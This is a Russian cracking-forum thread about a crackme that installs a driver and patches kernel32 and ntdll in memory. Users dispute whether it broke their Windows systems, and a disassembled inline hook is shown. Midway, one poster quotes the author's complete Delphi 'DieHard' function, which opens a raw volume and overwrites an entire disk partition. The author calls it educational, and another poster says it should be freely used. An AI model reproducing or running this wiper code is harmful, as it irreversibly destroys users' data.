Говорят, что на краклабе собираються самые лучшие кракеры рунета.
Хорошим кракерам для развития мозгов нужна тренировка, поэтому мне делать было нефиг, и я написал небольшой крякми, который ломать будет весьма интересно.
Сложность этого крякми низкая, но если кто-нибудь считает, что его легко взломать, то пусть сначала попробует это сделать.
Крякми этот немного специфичен, он требует наличия Win2k/XP (на других не идет). Загруженный софтайс ему тоже не нравиться.
Целью взлома является написание кейгена, или нахождение серийного номера.
Для проверки дам один правильный серийник:
Name: Ms-Rem
Serial: AFDA-08A1-8BD5-EB19-B375-5369-BBA5-3BA9

сам крякми качать тут: www.ms-rem.narod.ru/crackme.rar

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Бля взяли наехали на типа, глюки у того у кого руки кривые.

-----
have a nice day

| Сообщение посчитали полезным:

Большинство апи уходит в ринг 0, т.к. являются просто перемычками для вызова функций из ядра.

-----
have a nice day

| Сообщение посчитали полезным:

Nimnul
Так пусть эти перемычки,активируются в крякми.А тут получается патчится kernel и в любой проге потом уходят
в ядро.Нахер такое счастье.

| Сообщение посчитали полезным:

снеси драва которые с кряком, возьми у своего кориша kernel32.dll сотри_свой-залей_новый, и все проблемы.

PS: если у тебя нет корешей я могу одолжить тебе свой kernel32.dl

-----
have a nice day

| Сообщение посчитали полезным:

Ссылка на источник крякми не работает, дайте хоть заценить

| Сообщение посчитали полезным:

Работает ссылка, я только что проверил.

ULiX
Учти, что многие на этом крякми жестоко обломились...

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

ULiX
Это точно.Как минимум- систему переустановить пришлось.Там, даже после удаления драйвера - некоторые апи вызываются через ядро. Причем еще патчится kernel32.dll. Если тебе всеравно. можешь исследовать.

| Сообщение посчитали полезным:

Ничего, у меня в вычислительном зале много компов, один грохнуть не жалко. Всё равно с этими студентами часто переустанавливать приходится. Одним разом больше одним меньше

| Сообщение посчитали полезным:

kernel32.dll мой крякми не патчит и необратимых изменений в системе не производит.
За свои слова я отвечаю.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Нет, сам не патчит, но кто то его потом (загрузчик?) kernel32 патчит и вызов апи идет через него а не через твой драйвер.Странно слышать, твое заявление, после очевидных событий в системе.Или это
совпадение?
Тогда вопрос - у кого не так?

| Сообщение посчитали полезным:

патчит кернел 32 он только у себя в памяти а не на диске.
На другие процессы это никак не влияет.

Пусть все кто пробовали мой крякми выскажут тут свое мнение об этом.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Пусть все кто пробовали мой крякми выскажут тут свое мнение об этом.
Ну это похоже на правду. Патчить кернел32 на диске-это ахтунг. Надо просто снести драйвер и все вернется на свои места. Должно вернуться.
А вообще автору лучше знать, что делает его крякми. Если он сказал, то что еще надо?

| Сообщение посчитали полезным:

Ara
Это то что было у меня ,после удаления драйвера.Понятно,что динамически патчил, но это плохой тон
не сообщать предварительно.Или он не знал.Тогда я сообщил. что после удаления драйвера,апи так же вызываютя через патченный kernel32,есс но и загрузчик системный,а это извините тянет на вирус Ring0
.Буду рад - если кто нить это опровергнет...
Попробуй сам и сделай выводы...
Лично я теперь готов,любой вирь исследовать.Но это- после привентивных мер.

| Сообщение посчитали полезным:

test пишет:
Попробуй сам и сделай выводы...
Нее, я снес его сразу и крякми в карзину положил - подальше =)

| Сообщение посчитали полезным:

test
Еще раз повторяю - НИКАКИЕ ФАЙЛЫ НА ДИСКЕ НЕ ПАТЧАТСЯ!!

Если ты не можешь этот крякми сломать, то это не значит, что ты должен его обосрать так, чтобы другие его даже не посмотрели.
Я требую ФАКТИЧЕСКОГО подтверждения твоих слов, нечего меня к вирусописателям приравнивать.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Я требую ФАКТИЧЕСКОГО подтверждения твоих слов, нечего меня к вирусописателям приравнивать.
Ну это ты конечно не видел и вообще без понятия что это.......Ведь так?!
Ms-Rem пишет:
Отдизасмил этот крякми, посмотрел, показалось весьма знакомым...
В исходнике этот кож выглядел так:

{
Затирание нахрен раздела на винте.
Drive - буква уничтожаемого диска.
Функция возвращает успешность выполнения своей черной работы.
За использование в незаконных целях
автор не отвечает (сидеть сами будете).
}
function DieHard(Drive: Char): boolean;
var
hFile: dword;
Buff: pointer;
Written: dword;
DiskSize: int64;
SectorsPerCluster,
BytesPerSector,
FreeClusters,
Clusters: dword;
BuffSize, r: dword;
begin
Result := false;
hFile := CreateFile(PChar('\\.\' + Drive +':'), GENERIC_WRITE,
FILE_SHARE_READ or FILE_SHARE_WRITE,
nil, OPEN_EXISTING, 0, 0);
if hFile = INVALID_HANDLE_VALUE then Exit;
GetDiskFreeSpace(PChar(Drive + ':\'), SectorsPerCluster,
BytesPerSector, FreeClusters, Clusters);
DiskSize := SectorsPerCluster * BytesPerSector * Clusters;
BuffSize := SectorsPerCluster * BytesPerSector * 10;
GetMem(Buff, BuffSize);
for r := 0 to DiskSize div BuffSize do
WriteFile(hFile, Buff^, BuffSize, Written, nil);
FreeMem(Buff);
CloseHandle(hFile);
Result := true;
end;


Этот код я выкладывал на форуме васма недели две назад...
Приношу всем пострадавшим свои глубокие соболезнования...

Ms-Rem пишет:
Я требую ФАКТИЧЕСКОГО подтверждения твоих слов, нечего меня к вирусописателям приравнивать.
И вообще к вирусам отношения не имеешь!?
Пишешьс себе добрые программки:то кернел запатчит,то диск форматнёт!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

| Сообщение посчитали полезным:

Ms-Rem
Фактически - переустановка винды,ввиду необратимого изменения, нормальной работы системы.
Я уже говорил - после удаления драйвера.
Попробуй загрузить dllку в олю ,например , тот же kernel32.
Я перечислил проблемы, если ты их ликвидируешь ,это будет лучшим ответом.
И согласись,что патчить систему просто не красиво.Покрайне мере ,этот способ защиты ,мне встречается
в первые.
Ты не прав - я сообщил об этом ,когда его уже все посмотрели.И я не призываю отказываться от твоего
крякми , но предварительно принять меры не помешает.Я сообщил об этом здесь(это плохо??) - но это не намного хуже ,чем твое упорное молчание.

| Сообщение посчитали полезным:

test
Во первых: код форматирующий диск я привел в образовательных целях, и не несу ответственности за его применение всякими уродами.

Во вторых: еще раз повторяю, ни один файл на диске мой крякми не изменяет, а установленный драйвер никак не сказывается на работе незащищенных программ.
Ты видвинул мне обвинение в том что мой крякми делает необратимые изменения системы, так прошу это доказать. Приведи кусок кода который патчит файлы на диске, указания по обнаружению этого патча. Приведи хотя-бы какие нибудь данные по которым сторонний человек сможет либо подтвердить либо опровергнуть твои обвинения.

Прошу всех интересующихся этим спором сделать копию kernel32.dll до установки моего крякми и после установки и сравнить, о результатах проверки написать сюда.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

test
Не знаю че ты со своей виндой делал, я на 3 компах проверял все нормально

| Сообщение посчитали полезным:

test
не гони крякми ни чего не патчит, ищи причину в другом... Да и еслиб он что то пачил че ты как дитё? ты знал на что идеш, здесь нет правил!! Ни кто тебя за руку не дергал.

Antibug
>И вообще к вирусам отношения не имеешь!?
>Пишешьс себе добрые программки:то кернел запатчит,то диск форматнёт!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

За такие исходники спасибо надо говарить, а не пургу гнать.

-----
have a nice day

| Сообщение посчитали полезным:

Вот один фрагмент патча kernel32.dll.В памяти!Но разве это не патч?
Дело не в оригинальности а в том что это изменение вносится в системную dll.

было

7C810C8A 90 NOP
7C810C8B 90 NOP
7C810C8C 90 NOP
7C810C8D 90 NOP
7C810C8E 90 NOP
7C810C8F > 8BFF MOV EDI,EDI
7C810C91 55 PUSH EBP
7C810C92 8BEC MOV EBP,ESP
7C810C94 51 PUSH ECX




стало

7C810C8A 90 NOP
7C810C8B 90 NOP
7C810C8C 90 NOP
7C810C8D 90 NOP
7C810C8E 90 NOP
7C810C8F > PUSH 13155F34
7C810C94 C3 RETN

| Сообщение посчитали полезным:

Nimnul
Да я без претензий - просто, если нет правил - но есть принятая (по умолчанию)этика .
И не сообщить об этом- не хорошо.
Я уже не говорю о ребуте.А это наверно не очень здорово?
Способов угробить систему - много.И если каждый здесь будет писать такие крякми,то скоро точно ни кто
не станет их исследовать.

| Сообщение посчитали полезным:

Ключевое слово подчеркнуто.

test пишет:
Вот один фрагмент патча kernel32.dll.В памяти!Но разве это не патч?
Дело не в оригинальности а в том что это изменение вносится в системную dll.

Я тока не пойму, почему ты против изменений в памяти?? Как прогу какую пачить в памяти то это норматьно... а как корнел так уже нельзя??? не вижу логики... если на диске изменений нет, то ради бога твори в памяти что попало, хоть полностью корнел перепиши на свой.(утрирую)

| Сообщение посчитали полезным:

BoxaShu
Да в принципе не против(кстати патчится еще и NT.dll)не против и этого,только у меня ,пошло что то не так и функции вызывались из других приложений так же ??Я не стал продолжать.И это не вижу логики... если на диске изменений нет, то ради бога твори в памяти что попало слабое утешение

| Сообщение посчитали полезным:

test
Мне кажется, ты плохо представляешь модель памяти Windows NT.
При изменении системных библиотек в памяти срабатывает система CopyOnWrite, и измененными страницы памяти окажутся только в адресном пространстве защищенного приложения.
Ни на какие другие приложения защита влияния не оказывает, ВСЕ ИЗМНЕНИЯ КАСАЮТСЯ ТОЛЬКО ЗАЩИЩЕННОГО ПРИЛОЖЕНИЯ, все остальные процессы в системе имеют свою копию кернела.

Получается что программа изменяет только свой код, а разве можно ругать защиту за то, что она пытается защитится?
Может ты еще крякми ругать будешь за то что его непросто сломать? Не можешь, так не берись, а из за своего непонимания нечего понапрасну обсирать.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem
я еще раз повторю - у меня произошли изменения ,и оставались даже после удаления драйвера и крякми№1 и я не стал прожолжать потому что мне требовалась привычное поведение системы в других
приложениях .Хотя если не включать отладчик так вроде и нормально.Но мне нужно работать в привычной среде.А если твой крякми ,решил защитить все запускаемые приложения ,то пусть тебя благодарят разработчики
Я не против ,желания исследовать твой крякми, но он у меня зависает в процессе, а вот повторять ошибку
и дать ему изменить, что он хочет ,я теперь не желаю.
На счет системы я не профи.Но и ты ,вероятно, не все знаешь.Например, что бы грохнуть раздел не обязательно иметь привелегии .

| Сообщение посчитали полезным:

test
Давай сюда свою прогу которая грохает раздел, и я ее запущу у себя от пользователя без привилегий.
Тольлко учти, что все известные и некоторые пока неизвестные уязвимости в системе у меня залатаеы.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Nimnul пишет:
Antibug
>И вообще к вирусам отношения не имеешь!?
>Пишешьс себе добрые программки:то кернел запатчит,то диск форматнёт!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

За такие исходники спасибо надо говарить, а не пургу гнать.
Если пишут такие вещи(формат винта) надо както от придурков малолетних защищать(чтоб не заюзали)!

| Сообщение посчитали полезным:

Многие авторы в своих творения баги делают чтоб ошибок компилятора не было а код не работал

| Сообщение посчитали полезным:

>Если пишут такие вещи(формат винта) надо както от придурков малолетних защищать(чтоб не заюзали)!

Пускай юзают, развиваются. Седня они юзают завтра им будет интересно а как это работает, это же хорошо, это прогресс!! Вот когда ты будеш старый полу слепой дедушка, кто сделает тебе кряк на новую винду? Надо думать о будущем...

-----
have a nice day

| Сообщение посчитали полезным: